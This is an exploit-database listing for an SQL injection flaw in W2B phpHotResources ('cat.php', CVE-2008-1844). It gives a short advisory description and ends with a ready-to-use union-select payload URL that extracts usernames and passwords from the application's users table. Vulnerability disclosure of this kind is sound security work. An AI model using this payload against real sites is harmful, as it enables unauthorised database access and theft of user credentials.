W2B PHPHotResources - 'cat.php' SQL Injection



EKU-ID: 36592 CVE: CVE-2008-1844;OSVDB-44378 OSVDB-ID:
Author: The-0utl4w Published: 2008-04-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/28736/info

W2B phpHotResources is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects unknown versions of phpHotResources; we will update this BID when more details become available.

http://www.example.com/[path]/cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/*